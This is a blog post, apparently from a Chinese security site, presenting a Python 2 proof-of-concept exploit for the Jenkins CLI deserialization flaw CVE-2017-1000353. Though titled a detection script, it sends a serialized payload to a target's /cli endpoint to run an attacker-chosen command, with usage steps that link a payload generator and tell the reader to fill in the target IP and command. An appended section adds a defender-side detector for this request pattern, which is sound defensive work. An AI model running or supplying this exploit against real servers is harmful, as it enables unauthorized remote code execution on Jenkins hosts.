Jenkins Remote Code Execution Vulnerability Detection Script (CVE-2017-1000353)

# -*- coding: utf-8 -*-
import urllib
import requests
import uuid
import threading
import time
import gzip
import urllib3
import zlib
proxies = {
#  'http': 'http://127.0.0.1:8090',
#  'https': 'http://127.0.0.1:8090',
}
URL='http://目标IP:8080/cli'  # 目标IP is a placeholder for the target IP
# Python 2 script (it uses print statements).
# Preamble sent at the start of the upload stream
PREAMLE='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
# Four zero bytes sent after the preamble
PROTO = '\x00\x00\x00\x00'
# Serialized payload generated with jenkins_payload.jar (see the usage steps)
FILE_SER = open("jenkins_poc1.ser", "rb").read()

def download(url, session):
    # "download" side of the /cli channel; prints whatever the server returns
    headers = {'Side' : 'download'}
    headers['Content-type'] = 'application/x-www-form-urlencoded'
    headers['Session'] = session
    headers['Transfer-Encoding'] = 'chunked'
    r = requests.post(url, data=null_payload(), headers=headers, proxies=proxies, stream=True)
    print r.text

def upload(url, session, data):
    # "upload" side, sending the whole body in one request
    headers = {'Side' : 'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    r = requests.post(url, data=data, headers=headers, proxies=proxies)

def upload_chunked(url, session, data):
    # "upload" side with chunked transfer encoding; the data argument is unused,
    # the body comes from create_payload_chunked()
    headers = {'Side' : 'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    headers['Transfer-Encoding'] = 'chunked'
    headers['Cache-Control'] = 'no-cache'
    r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies)

def null_payload():
    yield " "

def create_payload():
    payload = PREAMLE + PROTO + FILE_SER
    return payload

def create_payload_chunked():
    yield PREAMLE
    yield PROTO
    yield FILE_SER

def main():
    print "start"
    session = str(uuid.uuid4())
    # Open the download side in a background thread, then send the upload side
    # with the same Session value
    t = threading.Thread(target=download, args=(URL, session))
    t.start()
    time.sleep(1)
    print "pwn"
    #upload(URL, session, create_payload())
    upload_chunked(URL, session, "asdf")

if __name__ == "__main__":
    main()

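Usage:

1. Download the payload. Link: http://pan.baidu.com/s/1pLFKTYz Password: j74r

2. Generate the payload (the quoted argument is the command you want to execute):

java -jar jenkins_payload.jar jenkins_poc1.ser "你要执行的命令"

3. Edit line 14 of the script, URL='http://目标IP:8080/cli' (目标IP stands for the target IP), then run it.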
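A defender-side check for the request pattern this script produces, as an added example that is not part of the original post: it pairs the `Side: download` and `Side: upload` POSTs to `/cli` by their `Session` value and tests whether the upload body is the preamble, four zero bytes, then a Java serialization stream header (`AC ED 00 05`). The record layout, the function names and the sample records are assumptions constructed for illustration, as is the premise that the `.ser` payload begins with the standard Java stream header.

```python
import base64
from collections import defaultdict

# Marker the script sends first on the upload side (copied from the page).
PREAMBLE = b"<===[JENKINS REMOTING CAPACITY]===>"
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"  # Java serialization stream header

def body_is_suspicious(body: bytes) -> bool:
    """True if body is preamble + base64 blob + 4 zero bytes + Java stream header."""
    if not body.startswith(PREAMBLE):
        return False
    rest = body[len(PREAMBLE):]
    sep = rest.find(b"\x00\x00\x00\x00")
    if sep < 0:
        return False
    try:
        base64.b64decode(rest[:sep], validate=True)
    except ValueError:
        return False
    return rest[sep + 4:].startswith(JAVA_SER_MAGIC)

def flag_sessions(requests_seen):
    """Return sorted Session ids with a download POST and a suspicious upload POST to /cli."""
    sides = defaultdict(set)
    hits = set()
    for r in requests_seen:
        if r["method"] != "POST" or r["path"].rstrip("/") != "/cli":
            continue
        sid = r["headers"].get("Session")
        side = r["headers"].get("Side")
        if not sid or side not in ("download", "upload"):
            continue
        sides[sid].add(side)
        if side == "upload" and body_is_suspicious(r["body"]):
            hits.add(sid)
    return sorted(s for s in hits if "download" in sides[s])

# Constructed sample records (not captured traffic); header names assumed normalised by the log source.
CAP = base64.b64encode(JAVA_SER_MAGIC + b"cap")
SAMPLE = [
    {"method": "POST", "path": "/cli", "headers": {"Side": "download", "Session": "s-1"}, "body": b" "},
    {"method": "POST", "path": "/cli", "headers": {"Side": "upload", "Session": "s-1"},
     "body": PREAMBLE + CAP + b"\x00" * 4 + JAVA_SER_MAGIC + b"sr"},
    {"method": "POST", "path": "/cli", "headers": {"Side": "upload", "Session": "s-2"}, "body": b"hello"},
    {"method": "GET", "path": "/login", "headers": {}, "body": b""},
]

if __name__ == "__main__":
    print(flag_sessions(SAMPLE))
```

A match shows that a request pair has this script's shape; treat it as a triage signal to review alongside the Jenkins version and logs, not as proof of compromise.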


Copyright notice: unless otherwise noted, all articles here are original works of 《颓废》; please retain the source when reposting.


Article link: Jenkins Remote Code Execution Vulnerability Detection Script (CVE-2017-1000353) - https://www.0dayhack.com/post-744.html
